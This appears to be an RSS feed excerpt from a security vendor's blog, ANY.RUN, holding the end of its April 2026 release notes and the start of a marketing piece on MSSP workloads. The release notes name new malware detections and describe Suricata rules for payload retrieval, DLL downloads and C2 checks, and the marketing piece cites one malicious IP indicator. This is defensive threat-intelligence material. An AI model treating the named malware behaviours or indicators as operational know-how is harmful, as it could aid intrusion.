<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/28125a7b-3f33-4886-8b1b-0752911e7208?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Suspicious macOS persistence plist</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/4a3e6d18-b221-4571-ba56-e13c3b9392ac?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">BankBot</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/3b24a245-82c7-4e32-b43c-4686a34b447e?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Killada</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/3b24a245-82c7-4e32-b43c-4686a34b447e?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Killada mutex</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/6e202e37-3804-4c41-99e6-85cbe591fe60?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Oblivion</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0629bf3a-f16a-445a-8f2c-3a903b5929a5?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">HangHost</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/9d8c6c97-fd37-4cd8-b1eb-a2cd12333830?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Raxid mutex</a>&nbsp;</li>
</ul>
</div></div>



<h3 class="wp-block-heading">New Suricata Rules&nbsp;</h3>



<p>In April, we also added&nbsp;<strong>1,657 new Suricata rules</strong>&nbsp;to improve visibility into malicious network activity, including payload retrieval, DLL downloads, and possible command-and-control checks.&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/fb1972a5-4157-4030-80a3-ab066e20196f/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DonutLoader base64-exe payload retrieval via HTTP</a>&nbsp;(sid: 85007037): Detects malware&#8217;s attempts to get executable payload from stager server via HTTP&nbsp;</li>



<li><a href="https://app.any.run/tasks/6594a017-1448-4e10-a62c-e9f4000f53b8/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Winos/ValleyRAT DLL download via TCP</a>&nbsp;(sid: 85007024):&nbsp;Identifies&nbsp;ValleyRAT&nbsp;related DLL-file downloads via non-standard port TCP connection&nbsp;</li>



<li><a href="https://app.any.run/tasks/c9f48db1-4513-4ccb-b52c-35ab53cf7be2/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Possible AsyncRAT-style TCP C2 connectivity check</a>&nbsp;(sid: 85007061): Heuristic rule tracking&nbsp;AsyncRAT-like malware implementations, based on set of connections to specific ports on the same host,&nbsp;likely checkingconnectivity with C2.&nbsp;</li>
</ul>



<p>With these additions, sandbox sessions can surface more network-level indicators tied to malware delivery and post-infection communication.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut response delays</span> before threats become costly incidents. <br>
Give your SOC <span class="highlight">faster, evidence-backed decisions. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=release-notes-april-2026&#038;utm_term=300426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate in your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">New YARA Rules&nbsp;</h3>



<p>In April, ANY.RUN added&nbsp;<strong>35 new YARA rules</strong>&nbsp;to expand static detection coverage for suspicious files and known threat artifacts.&nbsp;</p>



<p>This layer is especially useful when a sample&nbsp;contains&nbsp;recognizable strings, code patterns, or structural markers that can link it to a known detection before or alongside&nbsp;behavior-based analysis.&nbsp;</p>



<p>Highlighted YARA detections include:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1b337e18-5e92-43b0-a8d7-b6e8d25e8ee5?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Sentinel</a> </li>



<li><a href="https://app.any.run/tasks/0500e3a7-97dc-4a3e-9767-0b9f6b0ab766?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Datto</a> </li>



<li><a href="https://app.any.run/tasks/3a07a112-0393-4eb6-aa92-a1c972d17238?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Spank</a> </li>



<li><a href="https://app.any.run/tasks/7df99e42-df44-441e-9e40-aff2e2684c22?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DefendNot</a></li>



<li><a href="https://app.any.run/tasks/0667857e-51c3-4f16-ae85-5cc55e2b0dba?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Raton</a> </li>
</ul>



<p>Together, the new&nbsp;behavior&nbsp;signatures, Suricata rules, and YARA rules give security teams broader coverage across runtime&nbsp;behavior, network traffic, and file-level indicators.&nbsp;</p>



<h3 class="wp-block-heading">Threat Intelligence Reports&nbsp;</h3>



<p>In April, our team released new&nbsp;<a href="https://any.run/cybersecurity-blog/threat-intelligence-reports/" target="_blank" rel="noreferrer noopener">Threat Intelligence Reports</a>&nbsp;covering recent malware activity, attacker tooling, and techniques&nbsp;observed&nbsp;across real-world submissions.&nbsp;</p>



<p>Available as part of ANY.RUN’s&nbsp;<a href="https://intelligence.any.run/plans?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotiplans" target="_blank" rel="noreferrer noopener">TI Lookup Premium</a>&nbsp;plan, these reports give security teams a clearer view of how specific threats behave, what artifacts they leave behind, and which indicators can support faster investigation.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="532" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-1024x532.png" alt="Threat Intelligence reports in ANY.RUN " class="wp-image-20646" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-1024x532.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-300x156.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-768x399.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-1536x799.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-2048x1065.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-370x192.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-270x140.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-740x385.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat Intelligence reports in ANY.RUN with updated search parameters for faster threat investigation</em></figcaption></figure></div>


<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/reports/2026-04-15-threat-brief-mimic-crystalx-telnyx" target="_blank" rel="noreferrer noopener">MIMIC, CrystalX, and Trojanized Telnyx Package</a>:&nbsp;This report covers MIMIC ransomware,&nbsp;CrystalX&nbsp;RAT, and a&nbsp;trojanized&nbsp;Telnyx&nbsp;Python SDK, focusing on encryption&nbsp;behavior, remote access and persistence, and malicious code execution through unauthorized&nbsp;PyPI&nbsp;releases.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/reports/2026-04-09-threat-brief-etherrat-ocrfix-silentconnect" target="_blank" rel="noreferrer noopener">ETHERRAT, OCRFix, and SILENTCONNECT</a>:&nbsp;This brief examines a Node.js backdoor, a loader/botnet&nbsp;component, and a Windows loader, focusing on blockchain-based C2/configuration retrieval, scheduled-task persistence, in-memory PowerShell execution, and&nbsp;ScreenConnect&nbsp;deployment.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/reports/2026-04-01-threat-brief-crysome-infiniti-brushworm" target="_blank" rel="noreferrer noopener">CRYSOME, INFINITY, and BRUSHWORM</a>:&nbsp;This report examines a Windows RAT, a macOS stealer, and a Windows backdoor, focusing on TCP-based remote control,&nbsp;ClickFix-like delivery, credential theft, scheduled-task persistence, modular DLL download, and file theft.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p>ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and make confident decisions with real-world attack data.&nbsp;</p>



<p>Its solutions, including&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>,&nbsp;give SOC and MSSP teams the context they need to&nbsp;analyze&nbsp;malware, phishing, infrastructure,&nbsp;behaviors, and indicators in one workflow.&nbsp;</p>



<p>Trusted by more than&nbsp;<strong>15,000 organizations</strong>&nbsp;and&nbsp;<strong>600,000 security professionals worldwide</strong>, including&nbsp;<strong>74% of Fortune 100 companies</strong>, ANY.RUN helps teams improve triage speed, strengthen detection coverage, reduce investigation time, and respond to emerging threats with clearer evidence.&nbsp;</p>



<p><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener"><strong>Integrate ANY.RUN into your SOC workflow →</strong></a>&nbsp;</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/release-notes-april-2026/">Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/release-notes-april-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares</title>
		<link>https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/</link>
					<comments>https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 29 Apr 2026 07:29:04 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Interactive Sandbox]]></category>
		<category><![CDATA[MSSP]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20580</guid>

					<description><![CDATA[<p>Leading a managed security services provider has never been a comfortable job.&#160;And it&#160;isn’t&#160;now, though the&#160;demand for MSSPs has never been higher. The global threat landscape is expanding faster than most enterprise security teams can keep pace with, and organizations across every sector are turning to managed providers to fill the gap.&#160;&#160; For MSSP leaders, this [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/">Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Leading a managed security services provider has never been a comfortable job.&nbsp;And it&nbsp;isn’t&nbsp;now, though the&nbsp;demand for MSSPs has never been higher. The global threat landscape is expanding faster than most enterprise security teams can keep pace with, and organizations across every sector are turning to managed providers to fill the gap.&nbsp;&nbsp;</p>



<p>For MSSP leaders, this looks like&nbsp;an opportunity. And it is. The problem is that seizing it costs more than it used to.&nbsp;</p>



<h2 class="wp-block-heading">Key Points&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Linear scaling kills margins. </strong> <br>Adding more clients traditionally requires proportionally more analysts, making profitable growth nearly impossible. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Alert noise is expensive.</strong> <br>Up to 70% of alerts are false positives that waste analyst time and inflate operational costs. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Context gaps slow everything down.</strong> <br>Disconnected tools force manual aggregation of data from multiple systems, delaying investigations. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Tool switching destroys efficiency.</strong> <br>Constant platform hopping increases turnaround time and contributes to missed SLAs. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Standardization is essential for multi-client environments.</strong> <br>Every client being unique creates bespoke processes that do not scale and accelerate analyst burnout. </li>
</ul>



<ul class="wp-block-list">
<li><strong>ANY.RUN’s Threat Intelligence (</strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>TI Lookup</strong></a><strong> + </strong><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>TI Feeds</strong></a><strong>) and </strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> work as an integrated infrastructure layer that reduces manual labor and improves unit economics. </li>
</ul>



<ul class="wp-block-list">
<li><strong>True scalability comes from automation and shared context.</strong> <br>MSSPs can serve more clients at higher quality without linear headcount increases, while lowering stress and turnover. </li>
</ul>



<h2 class="wp-block-heading">The quiet storm inside every MSSP&nbsp;</h2>



<p>Threat actors automate attacks at unprecedented speed, while client environments grow more complex and diverse. MSSP leaders face mounting pressure to deliver faster, deeper, and more reliable protection across dozens or hundreds of customers:&nbsp;all while keeping margins healthy and SLAs intact.&nbsp;</p>



<ul class="wp-block-list">
<li>More clients still often means more analysts; </li>



<li>More alerts still means more noise; </li>



<li>More data still doesn’t mean more clarity. </li>
</ul>



<p>Meanwhile, the analysts carrying&nbsp;the weight&nbsp;are burning out. Turnover in MSSP analyst roles is among the highest in the industry, creating a perpetual cycle of recruitment, onboarding, and knowledge loss that compounds every other problem.&nbsp;</p>



<p>MSSP leaders&nbsp;aren’t&nbsp;looking for “another feature.”&nbsp;They’re&nbsp;looking for something closer to&nbsp;an operational&nbsp;backbone. Something that reduces manual effort and improves unit economics without adding complexity.&nbsp;</p>



<h2 class="wp-block-heading">1. Linear Growth Equals Margin Death: The Scalability Trap&nbsp;</h2>



<p>For many MSSPs, growth is a paradox: every new client increases revenue — but also operational cost at nearly the same rate. Hiring, training, and retaining talent is expensive and painful, with turnover creating constant friction. The more manual the work your analysts do per client, the harder it is to decouple revenue from headcount.  </p>



<p>Your revenue line and your cost line climb together, and the margin in between never quite widens the way a growth business should. </p>



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>The <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> directly attacks the cost-per-investigation problem by compressing deep malware analysis from hours to minutes and speeding up triage, so each analyst can handle significantly more cases without sacrificing quality or output depth. <br> <br>To see how the Sandbox <a href="https://any.run/cybersecurity-blog/automated-interactivity/" target="_blank" rel="noreferrer noopener">automatically interacts</a> with malware detonating the kill chain elements and eliminating the need for manual interventions for a malware analyst, <a href="https://app.any.run/tasks/4dbbd0c5-7941-4729-b91e-1ce420728ede/" target="_blank" rel="noreferrer noopener">view an analysis session</a>:</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="504" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-1024x504.png" alt="" class="wp-image-20599" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-1024x504.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-300x148.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-768x378.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-1536x756.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-370x182.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-270x133.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-740x364.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1.png 1848w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Sandbox analysis with automated CAPTCHA pass and QR link follow</em> </figcaption></figure>



<p><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;removes&nbsp;repetitive investigation steps by providing instant access to previously analyzed artifacts, indicators, and behaviors.&nbsp;It&nbsp;supports&nbsp;quick search across a&nbsp;huge database of contextual&nbsp;data on&nbsp;indicators&nbsp;and&nbsp;attacks&nbsp;drawn from sandbox investigations of over 15K SOC teams&nbsp;that are&nbsp;using ANY.RUN.&nbsp;&nbsp;</p>



<p>Together, these solutions&nbsp;shift effort from linear human scaling to&nbsp;knowledge&nbsp;reuse and automation. Analysts spend less time rebuilding context and more time making decisions.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="451" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-1024x451.png" alt="" class="wp-image-20600" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-1024x451.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-300x132.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-768x339.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-1536x677.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-370x163.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-270x119.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-740x326.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2.png 1624w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN operational and business impact </em></figcaption></figure>



<h2 class="wp-block-heading">2.&nbsp;Alert Noise Equals Wasted Money&nbsp;</h2>



<p>With up to 70% of alerts&nbsp;representing&nbsp;noise, MSSPs burn resources investigating false positives. Every unnecessary alert translates into extra analyst time, higher operational costs, and increased risk of missing genuine threats amid the fatigue.&nbsp;</p>



<p>The downstream effects compound quickly. Analysts fatigued by noise start to triage faster and less carefully. Real threats&nbsp;get&nbsp;downgraded. Critical detections get buried under the volume. The service quality the MSSP is paid to deliver degrades — quietly, then suddenly.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Improve triage accuracy. <br>
Reduce false positives to protect both <span class="highlight">your margins and your analysts’ time.<br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=+mssp-pains-solved-by-ti&#038;utm_term=290426&#038;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Try ANY.RUN
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>ANY.RUN Threat Intelligence —&nbsp;comprising&nbsp;TI Lookup and&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;— puts a verification and enrichment layer in front of the analyst queue, so that the 70% that&nbsp;doesn&#8217;t&nbsp;matter gets filtered before it consumes investigation resources, and the 30% that does matter arrives with actionable context.&nbsp;</p>



<ul class="wp-block-list">
<li>Cuts false positive handling time; </li>



<li>Raises triage confidence; </li>



<li>Reduces analyst fatigue across multi-client environments; </li>



<li>Feeds directly into SIEM and SOAR workflows. </li>
</ul>



<p>TI Lookup provides on-demand, deep queries across a continuously updated database of threats, allowing an analyst to&nbsp;determine&nbsp;in seconds whether a suspicious IP, domain, file hash, or URL is genuinely malicious, benign, or requires deeper analysis.&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktolookup/#%7B%2522query%2522:%2522destinationIP:%255C%2522103.224.212.211%255C%2522%2522,%2522dateRange%2522:180%7D" target="_blank" rel="noreferrer noopener">destinationIP:&#8221;103.224.212.211&#8243;</a> </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="564" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-1024x564.png" alt="" class="wp-image-20612" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-1024x564.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-300x165.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-768x423.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-1536x846.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-370x204.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-740x408.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3.png 1557w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>IP check in TI Lookup with a “malicious” verdict, additional IOCs, and sandbox analyses</em></figcaption></figure>



<p>TI Feeds deliver structured, high-fidelity threat data enriched with behavioral context that integrates directly into SIEM and SOAR workflows.&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-1024x576.png" alt="" class="wp-image-20613" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-740x416.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds integration capabilities</em></figcaption></figure>



<p>Instead of raw indicator lists that require manual validation, analysts receive intelligence that has already been correlated with real-world malware behavior&nbsp;observed&nbsp;in the Sandbox. The noise&nbsp;doesn&#8217;t&nbsp;just get filtered; it gets explained. Analysts spend time on what matters, and triage decisions become faster and more defensible.&nbsp;</p>



<h2 class="wp-block-heading">3.&nbsp;Missing Context: The Manual Puzzle Problem&nbsp;</h2>



<p>An MSSP&nbsp;analyst’s&nbsp;work happens across a fractured landscape. Threat intelligence feeds live in one place. SIEM alerts in another. Endpoint telemetry in a third. Sandboxing results in a fourth. An analyst responding to an incident&nbsp;doesn&#8217;t&nbsp;get the full picture handed to them. They construct it, manually, by pulling data from multiple sources, correlating it in their head or in a spreadsheet, and hoping nothing slips through the cracks.&nbsp;</p>



<p>This manual context assembly is slow, error-prone, and analyst-dependent.&nbsp;Investigations that should take minutes&nbsp;take&nbsp;hours. And in a threat landscape where speed matters, fragmented context is a liability that&nbsp;shows up in&nbsp;missed detections and broken SLAs.&nbsp;</p>



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>ANY.RUN collapses the distance between intelligence and action by delivering investigation context as a connected&nbsp;whole, giving&nbsp;MSSPs faster incident resolution, less analyst-dependent knowledge, and investigation outputs that hold their value even when team composition changes.&nbsp;</p>



<ul class="wp-block-list">
<li>Eliminates manual context assembly; </li>



<li>Connects intelligence to behavior; </li>



<li>Reduces investigation time per incident. </li>
</ul>



<p>ANY.RUN’s&nbsp;modules&nbsp;are designed for seamless integration and context sharing. The Interactive Sandbox delivers comprehensive behavioral data in one place:&nbsp;processes, network activity, MITRE ATT&amp;CK mappings, and more. TI Lookup instantly correlates any indicator (IOC, IOA, or IOB) with related threats, full attack chains, and supporting sandbox reports. TI Feeds extend this intelligence across the entire stack, feeding enriched data into existing workflows.&nbsp;</p>



